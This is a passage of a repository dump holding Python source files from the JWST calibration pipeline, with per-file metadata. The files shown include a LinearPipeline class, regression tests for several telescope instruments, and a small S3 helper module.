os.path.exists(spec_file):\n return spec_file\n return None\n\n\ndef islist_tuple(obj):\n \"\"\"\n Return True if `obj` is either a list or a tuple. False otherwise.\n \"\"\"\n return isinstance(obj, tuple) or isinstance(obj, list)\n" }, { "alpha_fraction": 0.5986177325248718, "alphanum_fraction": 0.6018075346946716, "avg_line_length": 35.64285659790039, "blob_id": "43c96b917d6235c51a48705ca0003202123cfdc7", "content_id": "139fb62540027e8bff50251b4ee9308cbbe5fb15", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5643, "license_type": "permissive", "max_line_length": 80, "num_lines": 154, "path": "/jwst/stpipe/linear_pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "# Copyright (C) 2010 Association of Universities for Research in Astronomy(AURA)\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n#\n# 2. Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n#\n# 3. The name of AURA and its representatives may not be used to\n# endorse or promote products derived from this software without\n# specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY AURA ``AS IS'' AND ANY EXPRESS OR IMPLIED\n# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. IN NO EVENT SHALL AURA BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS\n# OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR\n# TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE\n# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH\n# DAMAGE.\n\"\"\"\nLinearPipeline\n\n\"\"\"\nimport gc\n\nfrom .pipeline import Pipeline\n\n\nclass _LinearPipelineMetaclass(type):\n def __init__(cls, name, bases, dct):\n super(_LinearPipelineMetaclass, cls).__init__(name, bases, dct)\n pipeline_steps = cls.pipeline_steps\n if pipeline_steps is not None and len(pipeline_steps) == 0:\n raise ValueError(\n \"{0!r} LinearPipeline subclass defines no pipeline_steps\"\n .format(name))\n if pipeline_steps is None:\n pipeline_steps = []\n cls.step_defs = dict(pipeline_steps)\n\n# Since the pipeline_steps member needs to be converted to a step_defs\n# at the class level, we need to use a metaclass.\n\nclass LinearPipeline(Pipeline, metaclass=_LinearPipelineMetaclass):\n \"\"\"\n A LinearPipeline is a way of combining a number of steps together\n in a simple linear order.\n \"\"\"\n\n spec = \"\"\"\n # start_step and end_step allow only a part of the pipeline to run\n start_step = string(default=None) # Start the pipeline at this step\n end_step = string(default=None) # End the pipeline right before this step\n\n # [steps] section is implicitly added by the Pipeline class.\n \"\"\"\n\n # To be overridden by subclasses\n pipeline_steps = None\n\n def _check_start_and_end_steps(self):\n \"\"\"\n Given the start_step and end_step members (which are strings\n or None), find the actual step objects they correspond to.\n \"\"\"\n start_step = end_step = None\n\n if self.start_step is not None:\n if hasattr(self, self.start_step):\n start_step = getattr(self, self.start_step)\n else:\n raise ValueError(\n \"start_step {0!r} not found\".format(\n self.start_step))\n\n if self.end_step is not None:\n if hasattr(self, self.end_step):\n end_step = getattr(self, self.end_step)\n else:\n raise ValueError(\n \"end_step {0!r} not found\".format(\n self.end_step))\n\n return start_step, end_step\n\n def process(self, input_file):\n \"\"\"\n Run the pipeline.\n \"\"\"\n self._check_start_and_end_steps()\n\n do_caching = (\n self.end_step is not None and\n self.end_step != self.pipeline_steps[-1][0])\n\n if self.start_step is None:\n mode = 'RUN'\n else:\n mode = 'BEFORE'\n\n # It would be easiest to do this in a loop,\n # but we use recursion instead to make the \"with\" statements\n # work correctly\n\n def recurse(mode, input_file, pipeline_steps):\n gc.collect()\n if pipeline_steps == []:\n if (hasattr(self, 'output_file') and\n self.output_file is not None):\n input_file.save(self.output_file)\n return input_file\n\n name, cls = pipeline_steps[0]\n step = getattr(self, name)\n filename = '{0}.fits'.format(self.qualified_name)\n if name == self.start_step:\n mode = 'RUN'\n\n if mode == 'BEFORE':\n from .. import datamodels\n\n try:\n with datamodels.open(filename) as dm:\n pass\n except (ValueError, TypeError, IOError):\n return recurse(mode, filename, pipeline_steps[1:])\n else:\n dm = datamodels.open(filename)\n return recurse(mode, dm, pipeline_steps[1:])\n\n elif mode == 'RUN':\n dm = step(input_file)\n if do_caching:\n dm.save(filename)\n if name == self.end_step:\n return None\n return recurse(mode, dm, pipeline_steps[1:])\n\n result = recurse(mode, input_file, self.pipeline_steps)\n gc.collect()\n return result\n\n def set_input_filename(self, path):\n for name, cls in self.pipeline_steps:\n getattr(self, name).set_input_filename(path)\n" }, { "alpha_fraction": 0.531974196434021, "alphanum_fraction": 0.5745219588279724, "avg_line_length": 34.89545440673828, "blob_id": "806979a90e0dfb2965aeec1b39c80e7edcc6e9e5", "content_id": "66fc0a575e3b8b623dde8aa1b349b6d710ac7d85", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7897, "license_type": "permissive", "max_line_length": 100, "num_lines": 220, "path": "/jwst/tests_nightly/general/nircam/test_nircam_steps_single.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import os\nimport glob\n\nimport pytest\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\nfrom ci_watson.artifactory_helpers import get_bigdata\n\nfrom jwst.ramp_fitting import RampFitStep\nfrom jwst.wfs_combine import WfsCombineStep\nfrom jwst.pipeline import Detector1Pipeline\nfrom jwst.lib.set_telescope_pointing import add_wcs\nfrom jwst.lib import engdb_tools\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\n\nfrom jwst.stpipe import Step\n\n\[email protected]\nclass TestWFSImage2(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_datasets', 'sdp_jw82600_wfs', 'level2a', 'truth']\n test_dir = 'test_datasets'\n\n def test_wfs_image2(self):\n \"\"\"\n Regression test of the WFS&C `calwebb_wfs-image2.cfg` pipeline\n \"\"\"\n data_base = 'jw82600026001_02101_00001_nrca1_rate'\n ext = '.fits'\n input_name = '{}{}'.format(data_base, ext)\n input_file = self.get_data(self.test_dir, 'sdp_jw82600_wfs', 'level2a',\n input_name)\n\n collect_pipeline_cfgs('cfgs')\n Step.from_cmdline([os.path.join('cfgs', 'calwebb_wfs-image2.cfg'), input_file])\n\n cal_name = input_name.replace('rate', 'cal')\n output_name = input_name.replace('rate','cal_ref')\n outputs = [(cal_name, output_name)]\n self.compare_outputs(outputs)\n\n output_files = glob.glob('*')\n output_files.remove('cfgs')\n\n # these would happen when docopy=True\n if input_name in output_files:\n output_files.remove(input_name)\n if output_name in output_files:\n output_files.remove(output_name)\n if \"truth\" in output_files:\n output_files.remove(\"truth\")\n\n assert cal_name in output_files\n output_files.remove(cal_name)\n assert not output_files, 'Unexpected output files {}'.format(output_files)\n\n\[email protected]\nclass TestDetector1Pipeline(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_detector1pipeline', 'truth']\n test_dir = 'test_detector1pipeline'\n\n def test_detector1pipeline3(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on NIRCam data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw82500001003_02101_00001_NRCALONG_uncal.fits')\n step = Detector1Pipeline()\n step.save_calibrated_ramp = True\n step.ipc.skip = True\n step.refpix.odd_even_columns = True\n step.refpix.use_side_ref_pixels = False\n step.refpix.side_smoothing_length = 10\n step.refpix.side_gain = 1.0\n step.persistence.skip = True\n step.jump.rejection_threshold = 250.0\n step.ramp_fit.save_opt = True\n step.output_file = 'jw82500001003_02101_00001_NRCALONG_rate.fits'\n step.run(input_file)\n\n outputs = [('jw82500001003_02101_00001_NRCALONG_ramp.fits',\n 'jw82500001003_02101_00001_NRCALONG_ramp_ref.fits'),\n ('jw82500001003_02101_00001_NRCALONG_rate.fits',\n 'jw82500001003_02101_00001_NRCALONG_rate_ref.fits'),\n ('jw82500001003_02101_00001_NRCALONG_rateints.fits',\n 'jw82500001003_02101_00001_NRCALONG_rateints_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNIRCamRamp(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_ramp_fit', 'truth']\n test_dir = 'test_ramp_fit'\n\n def test_ramp_fit_nircam(self):\n \"\"\"\n Regression test of ramp_fit step performed on NIRCam data.\n \"\"\"\n input_file = self.get_data(self.test_dir,\n 'jw00017001001_01101_00001_NRCA1_jump.fits')\n\n result, result_int = RampFitStep.call(input_file,\n save_opt=True,\n opt_name='rampfit_opt_out.fits'\n )\n\n optout_file = 'rampfit_opt_out_fitopt.fits'\n output_file = result.meta.filename\n result.save(output_file)\n result.close()\n\n outputs = [(output_file,\n 'jw00017001001_01101_00001_NRCA1_ramp_fit.fits'),\n (optout_file,\n 'rampfit_opt_out.fits',\n ['primary','slope','sigslope','yint','sigyint','pedestal','weights','crmag']) ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestWFSCombine(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_wfs_combine', 'truth']\n test_dir = 'test_wfs_combine'\n\n def test_wfs_combine(self):\n \"\"\"\n Regression test of wfs_combine using do_refine=False (default)\n Association table has 3 (identical) pairs of input files to combine\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'wfs_3sets_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n WfsCombineStep.call(asn_file)\n\n outputs = [('test_wfscom_wfscmb.fits',\n 'test_wfscom.fits'),\n ('test_wfscoma_wfscmb.fits',\n 'test_wfscoma.fits'),\n ('test_wfscomb_wfscmb.fits',\n 'test_wfscomb.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_wfs_combine1(self):\n \"\"\"\n Regression test of wfs_combine using do_refine=True\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'wfs_3sets_asn2.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n WfsCombineStep.call(asn_file,\n do_refine=True )\n\n outputs = [('test_wfscom2_wfscmb.fits',\n 'test_wfscom_do_ref.fits'),\n ('test_wfscom2a_wfscmb.fits',\n 'test_wfscoma_do_ref.fits'),\n ('test_wfscom2b_wfscmb.fits',\n 'test_wfscomb_do_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n def test_wfs_combine2(self):\n \"\"\"\n Regression test of wfs_combine using do_refine=True\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'wfs_3sets_asn3.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n WfsCombineStep.call(asn_file,\n do_refine=True)\n\n outputs = [('test_wfscom3_wfscmb.fits',\n 'test_wfscom_do_ref.fits'),\n ('test_wfscom3a_wfscmb.fits',\n 'test_wfscoma_do_ref.fits'),\n ('test_wfscom3b_wfscmb.fits',\n 'test_wfscomb_do_ref.fits')\n ]\n self.compare_outputs(outputs)\n\n\[email protected]\nclass TestNrcGrismSetPointing(BaseJWSTTest):\n input_loc = 'nircam'\n ref_loc = ['test_pointing', 'truth']\n test_dir = 'test_pointing'\n rtol = 0.000001\n\n def test_nircam_setpointing(self):\n \"\"\"\n Regression test of the set_telescope_pointing script on a level-1b NIRCam file.\n \"\"\"\n\n # Copy original version of file to test file, which will get overwritten by test\n input_file = self.get_data(self.test_dir,\n 'jw00721012001_03103_00001-seg001_nrcalong_uncal_orig.fits')\n\n # Get SIAF PRD database file\n siaf_prd_loc = ['jwst-pipeline', self.env, 'common', 'prd.db']\n siaf_path = get_bigdata(*siaf_prd_loc)\n\n # Call the WCS routine, using the ENGDB_Service\n add_wcs(input_file, siaf_path=siaf_path, engdb_url=engdb_tools.ENGDB_BASE_URL)\n\n outputs = [(input_file,\n 'jw00721012001_03103_00001-seg001_nrcalong_uncal_ref.fits')]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.4931895434856415, "alphanum_fraction": 0.6010215878486633, "avg_line_length": 39.04545593261719, "blob_id": "c5ca41515aeaa173c2f20f37b3046e1f39f286c1", "content_id": "dd9acf8ab0536d929adfa28e85b73f766fa7104e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1762, "license_type": "permissive", "max_line_length": 89, "num_lines": 44, "path": "/jwst/tests_nightly/general/fgs/test_fgs_sloper_1.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline.calwebb_detector1 import Detector1Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest\n\n\[email protected]\[email protected]\nclass TestSloperPipeline(BaseJWSTTest):\n input_loc = 'fgs'\n ref_loc = ['test_sloperpipeline', 'truth']\n\n def test_fgs_detector1_1(self):\n \"\"\"\n Regression test of calwebb_detector1 pipeline performed on FGS imaging mode data.\n \"\"\"\n input_file = self.get_data('test_sloperpipeline',\n 'jw86500007001_02101_00001_GUIDER2_uncal.fits')\n pipe = Detector1Pipeline()\n pipe.ipc.skip = True\n pipe.refpix.odd_even_columns = True\n pipe.refpix.use_side_ref_pixels = True\n pipe.refpix.side_smoothing_length = 11\n pipe.refpix.side_gain = 1.0\n pipe.refpix.odd_even_rows = True\n pipe.jump.rejection_threshold = 250.0\n pipe.persistence.skip = True\n pipe.ramp_fit.save_opt = False\n pipe.save_calibrated_ramp = True\n pipe.output_file = 'jw86500007001_02101_00001_GUIDER2_rate.fits'\n\n pipe.run(input_file)\n\n outputs = [('jw86500007001_02101_00001_GUIDER2_ramp.fits',\n 'jw86500007001_02101_00001_GUIDER2_ramp_ref.fits',\n ['primary','sci','err','groupdq','pixeldq']),\n ('jw86500007001_02101_00001_GUIDER2_rateints.fits',\n 'jw86500007001_02101_00001_GUIDER2_rateints_ref.fits',\n ['primary','sci','err','dq']),\n ('jw86500007001_02101_00001_GUIDER2_rate.fits',\n 'jw86500007001_02101_00001_GUIDER2_rate_ref.fits',\n ['primary','sci','err','dq'])\n ]\n self.compare_outputs(outputs)\n" }, { "alpha_fraction": 0.6291841268539429, "alphanum_fraction": 0.6830543875694275, "avg_line_length": 38.83333206176758, "blob_id": "1e5677bb024948ca4061e0ec6194c5055adff3c9", "content_id": "bbd4e3825ccbfadb09f239f6e7f3a7b52508f66e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1912, "license_type": "permissive", "max_line_length": 84, "num_lines": 48, "path": "/jwst/tests_nightly/general/nirspec/test_nrs_ifu_wcs.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom numpy.testing import assert_allclose\nfrom gwcs.wcstools import grid_from_bounding_box\nfrom ci_watson.artifactory_helpers import get_bigdata\n\nfrom jwst.assign_wcs import AssignWcsStep, nirspec\nfrom jwst.datamodels import ImageModel\n\n\ntestdata = [\n ('nrs1', 'jw00011001001_01120_00001_NRS1_rate.fits',\n 'jw00011001001_01120_00001_NRS1_assign_wcs.fits'),\n ('nrs1_opaque', 'jw00011001001_01120_00001_NRS1_rate_opaque.fits',\n 'jw00011001001_01120_00001_NRS1_rate_opaque_assign_wcs.fits'),\n ('nrs2', 'NRSIFU-COMBO-030_NRS2_SloperPipeline.fits',\n 'NRSIFU-COMBO-030_NRS2_SloperPipeline_assign_wcs.fits')\n]\n\[email protected]\[email protected](\"test_id, input_file, truth_file\", testdata)\ndef test_nirspec_ifu_wcs(envopt, _jail, test_id, input_file, truth_file):\n \"\"\"\n Regression test of creating a WCS object and doing pixel to sky transformation.\n \"\"\"\n del test_id\n\n input_file = get_bigdata('jwst-pipeline', envopt,\n 'nirspec', 'test_wcs', 'nrs1-ifu', input_file)\n truth_file = get_bigdata('jwst-pipeline', envopt,\n 'nirspec', 'test_wcs', 'nrs1-ifu', 'truth', truth_file)\n\n result = AssignWcsStep.call(input_file, save_results=True, suffix='assign_wcs')\n result.close()\n\n im = ImageModel(result.meta.filename)\n imref = ImageModel(truth_file)\n w = nirspec.nrs_wcs_set_input(im, 0)\n grid = grid_from_bounding_box(w.bounding_box)\n ra, dec, lam = w(*grid)\n wref = nirspec.nrs_wcs_set_input(imref, 0)\n raref, decref, lamref = wref(*grid)\n\n # equal_nan is used here as many of the entries are nan.\n # The domain is defined but it is only a few entries in there that are valid\n # as it is a curved narrow slit.\n assert_allclose(ra, raref, equal_nan=True)\n assert_allclose(dec, decref, equal_nan=True)\n assert_allclose(lam, lamref, equal_nan=True)\n" }, { "alpha_fraction": 0.5639787316322327, "alphanum_fraction": 0.5760502219200134, "avg_line_length": 18.913461685180664, "blob_id": "80729d0fce70584a8ba3144e76dc1e64e8b08792", "content_id": "c9f3a84dfa230e736f90c2c844412f16a20fe8cf", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2071, "license_type": "permissive", "max_line_length": 84, "num_lines": 104, "path": "/jwst/lib/s3_utils.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"\nExperimental support for reading reference files from S3. Use of these functions\nrequires installing the [aws] extras (but this module can be safely imported without\nthem).\n\"\"\"\nimport atexit\n\n\n__all__ = [\"object_exists\", \"get_object\", \"get_client\", \"is_s3_uri\", \"split_uri\"]\n\n\n_CLIENT = None\n\n\ndef object_exists(uri):\n \"\"\"\n Determine if an object exists on S3.\n\n Parameters\n ----------\n uri : str\n S3 URI (s3://bucket-name/some/key)\n\n Returns\n -------\n bool\n `True` if object exists, `False` if not.\n \"\"\"\n bucket_name, key = split_uri(uri)\n return get_client().object_exists(bucket_name, key)\n\n\ndef get_object(uri):\n \"\"\"\n Fetch the content of an object from S3.\n\n Parameters\n ----------\n uri : str\n S3 URI (s3://bucket-name/some/key)\n\n Returns\n -------\n io.BytesIO\n The content of the object.\n \"\"\"\n bucket_name, key = split_uri(uri)\n return get_client().get_object(bucket_name, key)\n\n\ndef get_client():\n \"\"\"\n Get the shared instance of ConcurrentS3Client.\n\n Returns\n -------\n stsci_aws_utils.s3.ConcurrentS3Client\n \"\"\"\n global _CLIENT\n if _CLIENT is None:\n from stsci_aws_utils.s3 import ConcurrentS3Client\n _CLIENT = ConcurrentS3Client()\n atexit.register(_CLIENT.close)\n return _CLIENT\n\n\ndef is_s3_uri(value):\n \"\"\"\n Determine if a value represents an S3 URI.\n\n Parameters\n ----------\n value : str\n Value to test.\n\n Returns\n -------\n bool\n `True` if value is an S3 URI, `False` if not.\n \"\"\"\n return value.startswith(\"s3://\")\n\n\ndef split_uri(uri):\n \"\"\"\n Split an S3 URI into bucket name and key components.\n\n Parameters\n ----------\n uri : str\n S3 URI (s3://bucket-name/some/key)\n\n Returns\n -------\n str\n Bucket name URI component\n str\n Key URI component\n \"\"\"\n if not uri.startswith(\"s3://\"):\n raise ValueError(\"Expected S3 URI\")\n\n bucket_name, key = uri.replace(\"s3://\", \"\").split(\"/\", 1)\n return bucket_name, key\n" }, { "alpha_fraction": 0.7050827145576477, "alphanum_fraction": 0.7068557739257812, "avg_line_length": 34.25, "blob_id": "214a0bc23910708954bcadb3311d7c039b753910", "content_id": "756af7349a7fc2d91dae6beddcc8c655a26cc0e5", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1692, "license_type": "permissive", "max_line_length": 106, "num_lines": 48, "path": "/jwst/regtest/test_fgs_guider.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Regression tests for FGS Guidestar in ID and FINEGUIDE modes\"\"\"\nimport os\n\nimport pytest\nfrom astropy.io.fits.diff import FITSDiff\n\nfrom jwst.lib.suffix import replace_suffix\nfrom jwst.pipeline.collect_pipeline_cfgs import collect_pipeline_cfgs\nfrom jwst.stpipe import Step\n\n\ndef is_like_truth(rtdata, fitsdiff_default_kwargs, suffix, truth_path='truth/fgs/test_fgs_guider'):\n \"\"\"Compare step outputs with truth\"\"\"\n output = replace_suffix(\n os.path.splitext(os.path.basename(rtdata.input))[0], suffix\n ) + '.fits'\n rtdata.output = output\n\n rtdata.get_truth(os.path.join(truth_path, output))\n\n diff = FITSDiff(rtdata.output, rtdata.truth, **fitsdiff_default_kwargs)\n assert diff.identical, diff.report()\n\n\nfile_roots = ['exptype_fgs_acq1', 'exptype_fgs_fineguide', 'exptype_fgs_id_image', 'exptype_fgs_id_stack']\[email protected](scope='module', params=file_roots, ids=file_roots)\ndef run_guider_pipelines(jail, rtdata_module, request):\n \"\"\"Run pipeline for guider data\"\"\"\n rtdata = rtdata_module\n rtdata.get_data('fgs/level1b/' + request.param + '_uncal.fits')\n\n collect_pipeline_cfgs('config')\n args = [\n 'config/calwebb_guider.cfg',\n rtdata.input,\n '--steps.dq_init.save_results=true',\n '--steps.guider_cds.save_results=true',\n ]\n Step.from_cmdline(args)\n\n return rtdata\n\nguider_suffixes = ['cal', 'dq_init', 'guider_cds']\[email protected]\[email protected]('suffix', guider_suffixes, ids=guider_suffixes)\ndef test_fgs_guider(run_guider_pipelines, fitsdiff_default_kwargs, suffix):\n \"\"\"Regression for FGS Guider data\"\"\"\n is_like_truth(run_guider_pipelines, fitsdiff_default_kwargs, suffix)\n" }, { "alpha_fraction": 0.6110349297523499, "alphanum_fraction": 0.6282578706741333, "avg_line_length": 34.65760803222656, "blob_id": "9362c73a68fab2dd0ff994918a09804806ce560c", "content_id": "34825ee08da9aed5e012cadeb824837f8b41f895", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6561, "license_type": "permissive", "max_line_length": 98, "num_lines": 184, "path": "/jwst/regtest/test_miri_mrs.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "\"\"\"Regression tests for MIRI MRS modes\"\"\"\nfrom pathlib import Path\nimport pytest\n\nfrom numpy.testing import assert_allclose\nfrom jwst.associations import load_asn\nfrom jwst.lib.suffix import replace_suffix\nfrom jwst import datamodels\nfrom gwcs.wcstools import grid_from_bounding_box\nfrom . import regtestdata as rt\n\n# Define artifactory source and truth\nINPUT_PATH = 'miri/mrs'\nTRUTH_PATH = 'truth/test_miri_mrs'\n\n\[email protected](scope='module')\ndef run_spec2(jail, rtdata_module):\n \"\"\"Run the Spec2Pipeline on a single exposure\"\"\"\n rtdata = rtdata_module\n\n # Setup the inputs\n asn_name = 'ifushort_ch12_rate_asn3.json'\n rtdata.get_data(INPUT_PATH + '/' + asn_name)\n asn_path = rtdata.input\n with open(asn_path, 'r') as asn_fh:\n asn = load_asn(asn_fh)\n member_path = Path(asn['products'][0]['members'][0]['expname'])\n rate_path = member_path.stem\n rate_path = replace_suffix(rate_path, 'rate')\n rate_path = INPUT_PATH + '/' + rate_path + member_path.suffix\n\n # Run the pipeline\n step_params = {\n 'input_path': rate_path,\n 'step': 'calwebb_spec2.cfg',\n 'args': [\n '--steps.bkg_subtract.save_results=true',\n '--steps.assign_wcs.save_results=true',\n '--steps.imprint_subtract.save_results=true',\n '--steps.msa_flagging.save_results=true',\n '--steps.extract_2d.save_results=true',\n '--steps.flat_field.save_results=true',\n '--steps.srctype.save_results=true',\n '--steps.straylight.save_results=true',\n '--steps.fringe.save_results=true',\n '--steps.pathloss.save_results=true',\n '--steps.barshadow.save_results=true',\n '--steps.photom.save_results=true',\n '--steps.resample_spec.save_results=true',\n '--steps.cube_build.save_results=true',\n '--steps.extract_1d.save_results=true',\n ]\n }\n\n rtdata = rt.run_step_from_dict(rtdata, **step_params)\n return rtdata, asn_path\n\n\[email protected](scope='module')\ndef run_spec3(jail, run_spec2):\n \"\"\"Run the Spec3Pipeline on the results from the Spec2Pipeline run\"\"\"\n rtdata, asn_path = run_spec2\n\n # The presumption is that `run_spec2` has set the input to the\n # original association. To use this default, and not re-download\n # the association, simply do not specify `step_params[\"input_path\"]`\n rtdata.input = asn_path\n step_params = {\n 'step': 'calwebb_spec3.cfg',\n 'args': [\n '--steps.master_background.save_results=true',\n '--steps.mrs_imatch.save_results=true',\n '--steps.outlier_detection.save_results=true',\n '--steps.resample_spec.save_results=true',\n '--steps.cube_build.save_results=true',\n '--steps.extract_1d.save_results=true',\n '--steps.combine_1d.save_results=true',\n ]\n }\n\n return rt.run_step_from_dict(rtdata, **step_params)\n\n\[email protected](scope='module')\ndef run_spec3_multi(jail, rtdata_module):\n \"\"\"Run the Spec3Pipeline on multi channel/multi filter data\"\"\"\n step_params = {\n 'input_path': INPUT_PATH + '/' + 'ifushort_set2_asn3.json',\n 'step': 'calwebb_spec3.cfg',\n 'args': [\n '--steps.master_background.save_results=true',\n '--steps.mrs_imatch.save_results=true',\n '--steps.outlier_detection.save_results=true',\n '--steps.resample_spec.save_results=true',\n '--steps.cube_build.save_results=true',\n '--steps.extract_1d.save_results=true',\n '--steps.combine_1d.save_results=true',\n ]\n }\n\n return rt.run_step_from_dict(rtdata_module, **step_params)\n\n\[email protected]\[email protected](\n 'suffix',\n ['assign_wcs', 'cal', 'flat_field', 'fringe', 'photom', 's3d', 'srctype', 'straylight', 'x1d']\n)\ndef test_spec2(run_spec2, fitsdiff_default_kwargs, suffix):\n \"\"\"Test ensuring the callwebb_spec2 is operating appropriately for MIRI MRS data\"\"\"\n rtdata, asn_path = run_spec2\n rt.is_like_truth(rtdata, fitsdiff_default_kwargs, suffix,\n truth_path=TRUTH_PATH)\n\n\[email protected]\[email protected](\n 'output',\n [\n 'ifushort_ch12_spec3_mrs_imatch.fits',\n 'ifushort_ch12_spec3_ch1-medium_s3d.fits',\n 'ifushort_ch12_spec3_ch2-medium_s3d.fits',\n 'ifushort_ch12_spec3_ch1-medium_x1d.fits',\n 'ifushort_ch12_spec3_ch2-medium_x1d.fits',\n ],\n ids=[\"mrs_imatch\", \"ch1-s3d\", \"ch2-s3d\", \"ch1-x1d\", \"ch2-x1d\"]\n)\ndef test_spec3(run_spec3, fitsdiff_default_kwargs, output):\n \"\"\"Regression test matching output files\"\"\"\n rt.is_like_truth(\n run_spec3, fitsdiff_default_kwargs, output,\n truth_path=TRUTH_PATH,\n is_suffix=False\n )\n\n\[email protected]\[email protected](\n 'output',\n [\n 'ifushort_set2_0_mrs_imatch.fits',\n 'ifushort_set2_1_mrs_imatch.fits',\n 'ifushort_set2_0_a3001_crf.fits',\n 'ifushort_set2_1_a3001_crf.fits',\n 'ifushort_set2_ch1-short_s3d.fits',\n 'ifushort_set2_ch2-short_s3d.fits',\n 'ifushort_set2_ch1-short_x1d.fits',\n 'ifushort_set2_ch2-short_x1d.fits',\n ],\n ids=[\"ch1-mrs_imatch\", \"ch2-mrs_imatch\", \"ch1-crf\", \"ch2-crf\",\n \"ch1-s3d\", \"ch2-s3d\", \"ch1-x1d\", \"ch2-x1d\"]\n)\ndef test_spec3_multi(run_spec3_multi, fitsdiff_default_kwargs, output):\n \"\"\"Regression test matching output files\"\"\"\n rt.is_like_truth(\n run_spec3_multi, fitsdiff_default_kwargs, output,\n truth_path=TRUTH_PATH,\n is_suffix=False\n )\n\n\[email protected]\ndef test_miri_mrs_wcs(run_spec2, fitsdiff_default_kwargs):\n rtdata, asn_path = run_spec2\n # get input assign_wcs and truth file\n output = \"ifushort_ch12_assign_wcs.fits\"\n rtdata.output = output\n rtdata.get_truth(f\"truth/test_miri_mrs/{output}\")\n\n # Open the output and truth file\n with datamodels.open(rtdata.output) as im, datamodels.open(rtdata.truth) as im_truth:\n x, y = grid_from_bounding_box(im.meta.wcs.bounding_box)\n ra, dec, lam = im.meta.wcs(x, y)\n ratruth, dectruth, lamtruth = im_truth.meta.wcs(x, y)\n assert_allclose(ra, ratruth)\n assert_allclose(dec, dectruth)\n assert_allclose(lam, lamtruth)\n\n # Test the inverse transform\n xtest, ytest = im.meta.wcs.backward_transform(ra, dec, lam)\n xtruth, ytruth = im_truth.meta.wcs.backward_transform(ratruth, dectruth, lamtruth)\n assert_allclose(xtest, xtruth)\n assert_allclose(ytest, ytruth)\n" }, { "alpha_fraction": 0.45127248764038086, "alphanum_fraction": 0.5406579971313477, "avg_line_length": 38.77777862548828, "blob_id": "ae0ceaae6f482b4b710fbc92ff42529fe1fea395", "content_id": "e35d667a6dcff13569c72ccf0e5472734831875d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6444, "license_type": "permissive", "max_line_length": 104, "num_lines": 162, "path": "/jwst/tests_nightly/general/miri/test_miri_spec2pipeline.py", "repo_name": "mperrin/jwst", "src_encoding": "UTF-8", "text": "import pytest\nfrom jwst.pipeline import Spec2Pipeline\n\nfrom jwst.tests.base_classes import BaseJWSTTest, raw_from_asn\n\n\[email protected]\nclass TestSpec2Pipeline(BaseJWSTTest):\n input_loc = 'miri'\n ref_loc = ['test_spec2pipeline', 'truth']\n\n test_dir = 'test_spec2pipeline'\n\n def test_miri_lrs_bkgnod(self):\n \"\"\"\n\n Regression test of calwebb_spec2 pipeline performed on an association\n of nodded MIRI LRS fixed-slit exposures.\n\n \"\"\"\n asn_file = self.get_data(self.test_dir,\n 'lrs_bkgnod_asn.json')\n for file in raw_from_asn(asn_file):\n self.get_data(self.test_dir, file)\n\n step = 